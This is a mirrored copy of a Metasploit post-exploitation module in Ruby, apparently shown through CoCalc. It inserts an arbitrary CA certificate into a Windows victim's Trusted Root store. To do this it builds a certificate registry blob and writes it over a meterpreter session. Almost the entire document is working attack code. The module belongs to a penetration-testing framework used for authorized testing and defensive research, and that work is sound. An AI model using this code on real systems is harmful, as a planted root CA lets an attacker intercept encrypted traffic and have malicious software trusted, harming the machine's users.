CoCalc -- inject

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/inject_ca.rb
¹⁹⁶⁶⁴ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => 'Windows Manage Certificate Authority Injection',
13
        'Description' => %q{
14
          This module allows the attacker to insert an arbitrary CA certificate
15
          into the victim's Trusted Root store.
16
        },
17
        'License' => BSD_LICENSE,
18
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
19
        'Platform' => [ 'win' ],
20
        'SessionTypes' => [ 'meterpreter' ],
21
        'Compat' => {
22
          'Meterpreter' => {
23
            'Commands' => %w[
24
              stdapi_registry_create_key
25
              stdapi_registry_open_key
26
            ]
27
          }
28
        },
29
        'Notes' => {
30
          'Stability' => [CRASH_SAFE],
31
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
32
          'Reliability' => []
33
        }
34
      )
35
    )
36

37
    register_options(
38
      [
39
        OptPath.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])
40
      ]
41
    )
42
  end
43

44
  def run
45
    certfile = datastore['CAFILE']
46

47
    # Check file path
48
    begin
49
      ::File.stat(certfile)
50
    rescue StandardError
51
      print_error('CAFILE not found')
52
      return
53
    end
54

55
    # Load the file
56
    f = ::File.open(certfile, 'rb')
57
    cert = f.read(f.stat.size)
58
    f.close
59

60
    loadedcert = OpenSSL::X509::Certificate.new(cert)
61
    certmd5 = Digest::MD5.hexdigest(loadedcert.to_der).scan(/../)
62
    certsha1 = Digest::SHA1.hexdigest(loadedcert.to_der).scan(/../)
63
    cskiray = loadedcert.extensions[0].value.gsub(/:/, '').scan(/../)
64

65
    der_length = loadedcert.to_der.length.to_s(16)
66
    if (der_length.length < 4)
67
      der_length = "0#{der_length}"
68
    end
69

70
    der_ray = der_length.scan(/../)
71
    hex_der_length = [ der_ray[1], der_ray[0] ]
72

73
    certder = loadedcert.to_der.each_byte.collect { |val| '%02X' % val }
74

75
    bblob = [ '04', '00', '00', '00', '01', '00', '00', '00', '10', '00', '00', '00' ]
76
    bblob += certmd5
77
    bblob += [ '03', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
78
    bblob += certsha1
79
    bblob += [ '14', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
80
    bblob += cskiray
81
    bblob += [ '20', '00', '00', '00', '01', '00', '00', '00' ]
82
    bblob += hex_der_length
83
    bblob += [ '00', '00' ]
84
    bblob += certder
85

86
    blob = bblob.map(&:hex).pack('C*')
87

88
    cleancertsha1 = certsha1.to_s.gsub(/[\s\[\\"\]]/, '').gsub(/,/, '').upcase
89
    catree = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'
90
    entire_key = "#{catree}\\#{cleancertsha1}"
91
    root_key, base_key = client.sys.registry.splitkey(entire_key)
92

93
    # Perform the registry operations
94

95
    # Ensure the cert doesn't already exist
96
    begin
97
      open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + 0x0000)
98
      values = open_key.enum_value
99
      if !values.empty?
100
        print_error('Key already exists!')
101
        return
102
      end
103
    rescue StandardError
104
      open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + 0x0000)
105
      print_good("Successfully created key: #{entire_key}")
106

107
      open_key.set_value('Blob', REG_BINARY, blob)
108
      print_good('CA inserted!')
109
    end
110
  end
111
end
112

113
Product

Resources

Company
